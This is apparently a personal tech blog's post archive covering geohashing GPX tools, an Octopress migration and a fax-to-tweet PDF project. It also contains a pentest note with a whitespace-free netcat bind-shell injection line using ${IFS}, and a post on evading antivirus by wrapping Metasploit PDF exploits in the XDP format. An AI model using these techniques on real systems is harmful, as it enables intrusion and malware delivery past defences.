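    root = ET.Element("gpx", version="1.1", creator="geohash-sketch",
                      xmlns="http://www.topografix.com/GPX/1/1")
    for la in [lat_grat] + neighbours(lat_grat):
        for lo in [lon_grat] + neighbours(lon_grat):
            lat, lon = geohash(date_iso, djia_open, la, lo)
            wpt = ET.SubElement(root, "wpt", lat=f"{lat:.6f}", lon=f"{lon:.6f}")
            ET.SubElement(wpt, "name").text = f"{date_iso} {la} {lo}"
    return ET.tostring(root, encoding="unicode")
```

For example, print(gpx("2005-05-26", "10458.68", "37", "-122")) yields a file with nine waypoints that QLandkarte GT or gpsbabel should be able to read.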

But back from devices to the desktop, I wanted an easy way to view this in QLandkarte GT and keep it updated. Luckily, QLandkarte GT offers a sort of reload feature with the “-m” command line option. I’ve written a small wrapper which makes this available using a signal handler:

$ cat bin/qlandkartegt_reloadable.rb 
#!/usr/bin/env ruby

f = IO.popen("qlandkartegt -m0 #{ARGV.join(' ')}", 'w')

trap('USR1') do
  f.write 'A'
end
Process.wait

So now I can do something along the lines of:

qlandkartegt_reloadable.rb ~/gps/geohash.gpx
wget http://geohashing-gpx.heroku.com/multi/1/49/8 -O ~/gps/geohash.gpx && pkill -USR1 -f qlandkartegt_reloadable.rb

to keep the data shown in my (always open) QLandkarte GT up to date.

The only things on my TODO list for this are timezones (it works using UTC at the moment, which is fine for me since I am pretty close to UTC, but may be annoying if you are not) and the possible addition of business holidays to figure out whether tomorrow will have a new DJIA opening value or not (if anyone has a good, free source, please let me know). I might work on this or I might not; chances are higher if someone bothers me to do so.

Shell injection without whitespace

In a recent penetration test, I was in the situation where I could inject code into a Perl system call, but whitespace (\s+) was filtered beforehand (probably not for security but rather for functionality reasons).

While looking for a way to execute more than a parameterless binary (which of course would have been a possible solution had I had a way to put a custom binary on the system), I stumbled over the $IFS variable, the “Internal Field Separator”, whose default value is “<space><tab><newline>”. Because the shell splits the result of an unquoted ${IFS} expansion into separate words, it also works fine as a separator between a command and its arguments, so you can inject something like:

nc${IFS}-l${IFS}-p1337${IFS}-e/bin/sh

without using a single whitespace character. May it come in handy for you one day.
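A harmless way to see the trick in action is Python's subprocess with /bin/sh. The re.sub line is my stand-in for the original Perl filter, and echo replaces the netcat payload:

```python
import re
import subprocess

payload = "echo${IFS}hello${IFS}world"

# Stand-in for the (Perl) filter from the pentest: strip all whitespace
filtered = re.sub(r"\s+", "", payload)
assert filtered == payload  # nothing for the filter to remove

# /bin/sh expands ${IFS} and then splits the result into separate words
result = subprocess.run(filtered, shell=True, capture_output=True, text=True)
print(result.stdout, end="")  # prints "hello world"
```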

Moving to Octopress

My blog has been running on Angerwhale, a Catalyst-based Perl blog framework. Although it worked fine for me from a usability point of view (plain text files plus some meta-data), it was way too slow to deal with a few concurrent hits. I never noticed until @chaosupdates linked to my blog post about @cryptofax2tweet and the server more or less exploded in (virtual) flames.

I tried switching from the standalone server (no surprise that it did not deal well with the load, but it had been fine for my little blog here for a long time) to a proper mod_perl-based installation, but that did not help much.

As I am more confident with Ruby than Perl nowadays, I started looking for something to switch to. A static solution would of course be nice to have because of the speed factor, so after some searching and #followerpower, I stumbled over Octopress, which uses the Jekyll framework.

I converted all my Angerwhale posts to Octopress using a small Ruby script (ping me if you are interested). The comments from the old site are still missing, but I am considering converting them with the Jekyll::StaticComments plugin.

The plan for now is to try to blog a bit more than before; maybe it should be on my list of new year's resolutions (or maybe not, so as not to jinx it ;-)).

Introducing CryptoFax2Tweet

Meet @cryptofax2tweet, a new Twitter account I run. So, what is so special about this account? As the name suggests, it can be used to tweet by sending an encrypted QR code via fax, for example when your government decides to turn off the internet. In case you are not interested in the technical details of how it works and just want to use it, you can download the cryptofax.pdf file and open it in Adobe Reader. A one-page user's guide is also available.

So, how does this work? Recent PDF versions support the XML Forms Architecture (XFA), which I've been playing with lately. It includes all kinds of funny things, such as its own language, FormCalc (because having both Javascript and Flash in Reader is not enough, apparently). It does not seem to be more useful than Javascript, except if you want to generate arbitrary HTTP requests.

But I am digressing. One of the more interesting features of XFA is the possibility to create all kinds of barcodes, both one- and two-dimensional. The list of different types you can create in the specification is about five pages long(!). Also, the specification claims that the content of the barcode can be encrypted before creating it using an RC4/RSA hybrid encryption.

I had recently read about Google's @speak2tweet account and liked the idea but not the Medienbruch, i.e. the change from one medium (voice) to another (text). So I thought about implementing something using XFA which would allow people to send tweets via fax.

One obstacle on the way was finding out that Adobe does not want you to create dynamic 2D barcodes if you do not have the license for it. Unfortunately, if you do not know this and modify the rawValue attribute of the barcode field after the form has rendered, you just get to see a grey block instead of the barcode and keep wondering whether Adobe just broke the functionality. Also, debugging Javascript code when you only have Adobe Reader is less fun than you might think. Once I figured that out, I realised that you can ask for the dynamic information in the initialize event handler using app.response() and create the barcode at that point (not sure whether Adobe would consider this a bug or a feature).

After that was solved, I looked into encrypting the content of the tweet. Note that the encryption only helps against an attacker who monitors the phone lines and not the @cryptofax2tweet account. Still, it might help people whose printed-out fax gets intercepted before it has been sent. Unfortunately, it looks like this particular functionality from the specification has not been implemented in Reader (the fact that the LiveCycle® Designer ES Scripting Reference does not mention it at all points in this direction, too).

Luckily, there was no need to implement the cryptography myself, as there is already a pretty nice BSD-licensed RSA implementation for Javascript. A few patches later to fix some Reader-specific oddities, I was able to RSA-encrypt a tweet. As a tweet can only be 140 characters (thus at most 560 bytes in UTF-8), I just used a 4096-bit RSA key (not for security, just for convenience reasons :-). This would enable us to encode at most 128 four-byte UTF-8 characters (e.g. Klingon in the private use area). I accepted this trade-off, and in the end it turned out that inputting four-byte UTF-8 characters using app.response() was impossible anyway.
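The sizes work out as follows. Without padding, 512 / 4 gives the 128 characters mentioned above; if the library applies PKCS#1 v1.5 padding (an assumption on my part, I have not stated which padding it uses), the bound shrinks slightly:

```python
TWEET_CHARS = 140
MAX_UTF8_BYTES = 4       # the longest UTF-8 encoding of a single code point
RSA_BITS = 4096
PKCS1_V15_OVERHEAD = 11  # ASSUMPTION: PKCS#1 v1.5 padding

worst_case_tweet = TWEET_CHARS * MAX_UTF8_BYTES     # bytes for 140 four-byte chars
modulus_bytes = RSA_BITS // 8                       # size of one RSA block
usable_bytes = modulus_bytes - PKCS1_V15_OVERHEAD   # plaintext that fits one block

print(worst_case_tweet, modulus_bytes, usable_bytes)                    # prints "560 512 501"
print(modulus_bytes // MAX_UTF8_BYTES, usable_bytes // MAX_UTF8_BYTES)  # prints "128 125"
print(len("\U0001F596".encode("utf-8")))  # a character outside the BMP: prints "4"
```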

The other end of the service needs to decode the QR code, decrypt the content and tweet it. This part was a lot easier than the PDF part, as it could be implemented in less than 50 lines using Ruby and the ZBar barcode library. A fax number was thankfully provided by AS250.net so that I only needed to deal with emails from the fax2mail gateway.

If you managed to read this far, you might be interested in the code, which is available in a Git repository (or see the Gitweb interface).

Evading AVs using the XML Data Package (XDP) format

At work, I recently obtained a copy of iText in Action, 2nd Edition because I have been playing with PDF a bit lately and the book not only offers advice on how to use the Java PDF library iText but also some background on PDF internals and the new features in PDF 1.7.

One thing I stumbled upon in the book was that there is a format called XML Data Package (XDP) which can be used to represent a PDF as XML. So of course I downloaded the specification and went to play with it a bit.

Acrobat Reader opens XDP files just fine if they have an .xdp file extension or if they are sent by a webserver with the application/vnd.adobe.xdp+xml MIME type. It was an easy exercise to write a small script to convert a given PDF to an XDP file (basically it's just an XML header, the Base64-encoded PDF and an XML footer).
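A minimal Python sketch of such a conversion (not the pdf2xdp.rb script itself) could look like this. The element names follow my reading of the XDP specification, so treat them as an assumption:

```python
import base64

# ASSUMPTION: the PDF is carried Base64-encoded in <pdf><document><chunk>
# inside the <xdp:xdp> root element.
XDP_TEMPLATE = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">\n'
    '<pdf xmlns="http://ns.adobe.com/xdp/pdf/"><document><chunk>{chunk}</chunk></document></pdf>\n'
    "</xdp:xdp>\n"
)


def pdf_to_xdp(pdf_bytes):
    """Wrap raw PDF bytes into an XDP document: header, Base64 PDF, footer."""
    chunk = base64.b64encode(pdf_bytes).decode("ascii")
    return XDP_TEMPLATE.format(chunk=chunk)
```

To use it, write the result of pdf_to_xdp() on the bytes of an existing PDF to a file with an .xdp extension.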

I was wondering how antivirus products would react to a malicious PDF file disguised as an XDP. Thus, I generated a PDF containing an exploit using Metasploit and uploaded it to VirusTotal. 13 out of 43 products classified the PDF as malware. Interestingly enough, 0/43 recognized the equivalent XDP file as malware (and neither did a few mail gateways I tested).

I've just submitted a feature request for Metasploit to add XDP support and added my pdf2xdp.rb script as a starting point. Let's see where this is heading.